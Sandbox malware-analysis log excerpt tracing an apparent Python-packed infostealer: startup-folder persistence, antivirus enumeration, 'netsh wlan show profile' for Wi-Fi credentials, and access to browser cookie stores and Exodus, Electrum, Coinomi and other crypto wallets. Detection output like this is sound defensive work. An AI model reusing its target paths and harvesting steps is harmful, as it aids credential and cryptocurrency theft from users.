              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Queries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformation
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformation
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\select.pyd VolumeInformation
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\unicodedata.pyd VolumeInformation
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr VolumeInformation
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\content-prefs.sqlite VolumeInformation
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite VolumeInformation
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite VolumeInformation
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\permissions.sqlite VolumeInformation
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite VolumeInformation
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\? ?\System\Antivirus.txt VolumeInformation
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Queries volume information: C:\Users\user\Desktop\AQRFEVRTGL.xlsx VolumeInformation
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\? ?\Common Files\Desktop\AQRFEVRTGL.xlsx VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C266D080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00007FF7C266D080
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C2685C70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,4_2_00007FF7C2685C70
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D48CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,97_2_00007FF7080D48CC
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              Source: Yara matchFile source: 00000007.00000003.1686994735.000001E7C3B87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1689633424.000001E7C39E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.1709310873.000001E7C39E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.1275666676.000001FB29EE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.1275666676.000001FB29EE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1689985178.000001E7C39E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: X9g8L63QGs.exe PID: 3396, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: X9g8L63QGs.exe PID: 3800, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI33962\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: X9g8L63QGs.exe PID: 3800, type: MEMORYSTR
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Electrum
              Source: X9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C346C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Exodus
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Ethereum
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\content-prefs.sqlite
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeFile read: C:\Users\user\AppData\Local\Temp\? ?\Credentials\Chrome\Chrome Cookies.txt
              Source: Yara matchFile source: Process Memory Space: X9g8L63QGs.exe PID: 3800, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara matchFile source: 00000007.00000003.1686994735.000001E7C3B87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1689633424.000001E7C39E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.1709310873.000001E7C39E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.1275666676.000001FB29EE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.1275666676.000001FB29EE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
